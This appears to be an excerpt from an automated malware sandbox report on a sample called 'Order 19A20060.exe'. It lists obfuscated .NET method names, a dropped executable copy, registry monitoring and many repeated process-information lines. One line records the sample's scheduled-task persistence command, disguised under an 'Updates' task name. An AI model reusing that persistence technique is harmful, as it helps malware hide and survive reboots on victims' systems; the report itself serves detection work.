                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, hUhcmy3lEZX7p7rkKR.csHigh entropy of concatenated method names: 'AgnVxEBTl', 'PacBoDx1i', 'Id1JO5eZv', 'bxMQoj5I2', 'hyQb5FDZH', 'zrtUoKuiu', 'Mf9AmFLbOsXvMEeqK0', 'AysysWE93pfTB1pmdD', 'lEkK4cnHg', 'zG3qJXJ3d'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, k8FlRTXGa11THocf7O.csHigh entropy of concatenated method names: 'IdH72Njrbe', 'clk7DJiHce', 'NdwK5NTm7B', 'tMNKarodt0', 'Yjm7f8Gmfr', 'CYB7cmpv1f', 'ArD7dV8QM6', 'lCK7SwOFYp', 'krD7TSJFP9', 'DrV7e2fBL2'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, edBmslGXvQJGNrkwfA.csHigh entropy of concatenated method names: 'Rk4KREGWZe', 'xd0K4E5N7e', 'uFnKIEIgMZ', 'QSLKxDV1JZ', 'jxDKWLQ7mM', 'bw2K3MheMQ', 'pM6KnEa1kH', 'Wx6KCLhEcc', 'z1NKGMBnDa', 'VZLKLE42uH'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, hnSKDgPdxxREZ6uQuW.csHigh entropy of concatenated method names: 'Lb1K6EEUtG', 'XiTKwAXnry', 'kowKvXLaix', 'o2QKA03ALA', 'wIYKS8mOSy', 'x81KlvE3rB', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, NHB3Ex1kT7YT8HRPfM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'kcNmg9BH17', 'y8rmD6wViK', 'vc7mzAlsFL', 'hesO5feMWN', 'rJgOa9gdjU', 'iZPOmwtEm2', 'iAIOOridGD', 'eMjAI8OBbaCIiSHkOi7'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, fAVKuvuFTK59FdWbkg.csHigh entropy of concatenated method names: 'BMeWHdyW6K', 'pMhW4x0yG8', 'vCKWxpdHbF', 'OiGW3Oqu2V', 'J3bWnd0tds', 'hCAxNRlewC', 'GmAx9Ubv1B', 'QFqxMpsDsm', 'WZJx21gmJm', 'tnwxgPGaH3'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, Fk1LKsKMFn2wWBa1gds.csHigh entropy of concatenated method names: 'qxSj0ZSWhT', 'iI7jZdlUlQ', 'xNMjVL3ANc', 'ah0jBHfhEm', 'BWMjPDMHXM', 'yAjjJW8WSm', 'O2RjQFiEao', 'iXbjFIPvKA', 'kUQjb9Mg3R', 'pj6jUagLDs'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, iJCoYiaJAT8kNOyDMw.csHigh entropy of concatenated method names: 'BEZyFV6ScL', 'dLKybZiHOT', 'vyPy6OUYUY', 'Jg3yw5O6X3', 'FaEyAIcTec', 'p4Qyl68ppP', 'oxNyrxHktm', 'KlWypTn8mg', 'njSyhBuqpK', 'Fh2yfhFwEc'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, NVCjVwCBo2qT0rJYOq.csHigh entropy of concatenated method names: 'N7VxP8Tefe', 'yQjxQYEvny', 'faBIvjOXXS', 'y7qIANWBLE', 'hyLIllW1Sb', 'DjwIXeU355', 'oowIrlkBci', 'zdSIp5fCxP', 'GPkI1K0E8Y', 'wYfIhOno5M'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, PLYi7NqDAj7tKXD9fM.csHigh entropy of concatenated method names: 'uYI30U1XL6', 'UE53Z25NTl', 'kew3VUHn4l', 'fc13B4iLE4', 'yaY3PlyYCI', 'kqp3JQ3pfM', 'KlV3QVGpO4', 'f203FEJpvn', 'v923bQNrff', 'ADJ3Ulwbll'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, dhgBtnNpaPi78GpYtK.csHigh entropy of concatenated method names: 'Dispose', 'Y8AagaCoEr', 'FjVmwuMcX6', 'yt8YYyYMUN', 'axuaDaxfXr', 'CNZazh7suP', 'ProcessDialogKey', 'I5hm5HmRAm', 'zHnmaTQa4I', 'MvFmmlXgDb'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, SbQEYZeNKpsZUcDnfO.csHigh entropy of concatenated method names: 'b97a34YDso', 'm5danEjfAM', 'uYxaG044iN', 'OdoaLZ0yl5', 'BpIa89fCFB', 'dssasOFmsc', 'kcae0nS6LXh3Y8F0ND', 'Lwua5pbfBxoU5uivQW', 'YwPaa5Pfe8', 'uNhaOZ2yrW'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, OFjfvMK318xsG41tlLV.csHigh entropy of concatenated method names: 'iVKq0mdLyk', 'RHGqZ9utmA', 'pRaqV4UHjp', 'IlQCiFyxbf4oN5yOF61', 'WmYlW7yhkg6UhCUXq0Z', 'cwdREmyalhF6cKPwnS8', 'YnMlBwyG3PGd60ZTbVH'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, LaZPtv2pWN66FdMorM.csHigh entropy of concatenated method names: 'egM4Sh0qFP', 'Gfx4Twirgs', 'MK24eFtDLs', 'SlD4ECpHme', 'Huy4NlLAY9', 'oFx49yNpno', 'S014MrQ4eh', 'ouV42kg2Un', 'GWW4g73vcL', 'B0G4D02TV6'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, U5QFouQCkrB4Z0KQFC.csHigh entropy of concatenated method names: 'AePOHZyd4i', 'gRKORSLv2e', 'teBO4rikg7', 'EaGOI7W0bf', 'OTbOxPYDHi', 'zKPOWoaYm7', 'mdvO3qer9v', 'sAVOngnild', 'er1OCR2RuK', 'GXSOG2Z7aK'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, yYvJGqUhfFf5jWgkiM.csHigh entropy of concatenated method names: 'UFPIBfdKxG', 'FqqIJnZvTe', 'v1XIF3t4Nn', 'QjlIbTWpC8', 'suPI8D7g7L', 'fjpIss9B9u', 'MXTI7Rh4j0', 'piZIKg6Lwj', 'QKeIjFaKAe', 'q0CIqWNNrl'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, ENxRiUKwBLEuVCntRbw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mqrqSu1DR9', 'fsEqTrfoWk', 'QHVqecmpHj', 'KpfqEsgC86', 'kpwqNaSpP6', 'mSPq9da2eF', 'Bb1qMug8SV'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, H87RftrjGG8r2FvNBF.csHigh entropy of concatenated method names: 'r1RjacZnWC', 'feOjOJvVEx', 'dVQjkMgOb2', 'L8CjR6yFMO', 'rVhj4IeBbp', 'jGsjxopWHy', 'RuhjWBIsos', 'oyaKMqcfUd', 'bT0K2SXVbr', 'rQ3KgrNoSq'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, Vg5x4uBd0QJ3iVm1AV.csHigh entropy of concatenated method names: 'KEj7GHR4kO', 'gPd7LkofjD', 'ToString', 'qiI7Rsr2wA', 'BDn74Vxnfl', 'cke7Iq1P6o', 'aEo7xYK3vO', 'xF97W9QwBA', 'B7r73Ixpyx', 'kCq7nprQWN'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, QXW51sL4EjyLUYOJjf.csHigh entropy of concatenated method names: 'ToString', 'StRsfBXadc', 'sCXswwAdZH', 'z5GsvZ6Kmp', 'pwMsASq2Pg', 'oraslBX3fU', 'CVLsXNTK89', 'tccsreZTaC', 'oBSspMGRu9', 'mlns1oXf2O'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, s8RL864bc3Zg1rQIYm.csHigh entropy of concatenated method names: 'Emb3RUPpSi', 'u4r3IlnetD', 'CtF3Wm7eFA', 'LZ1WDNNQYw', 'fGAWzUuOw4', 'lgB35XgPur', 'VUS3aRg7s7', 'NSk3mmZHqF', 'jNT3OVAoSN', 'o2Q3kUMEwC'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, hUhcmy3lEZX7p7rkKR.csHigh entropy of concatenated method names: 'AgnVxEBTl', 'PacBoDx1i', 'Id1JO5eZv', 'bxMQoj5I2', 'hyQb5FDZH', 'zrtUoKuiu', 'Mf9AmFLbOsXvMEeqK0', 'AysysWE93pfTB1pmdD', 'lEkK4cnHg', 'zG3qJXJ3d'
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, k8FlRTXGa11THocf7O.csHigh entropy of concatenated method names: 'IdH72Njrbe', 'clk7DJiHce', 'NdwK5NTm7B', 'tMNKarodt0', 'Yjm7f8Gmfr', 'CYB7cmpv1f', 'ArD7dV8QM6', 'lCK7SwOFYp', 'krD7TSJFP9', 'DrV7e2fBL2'
                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp
                        Source: C:\Users\user\Desktop\Order 19A20060.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
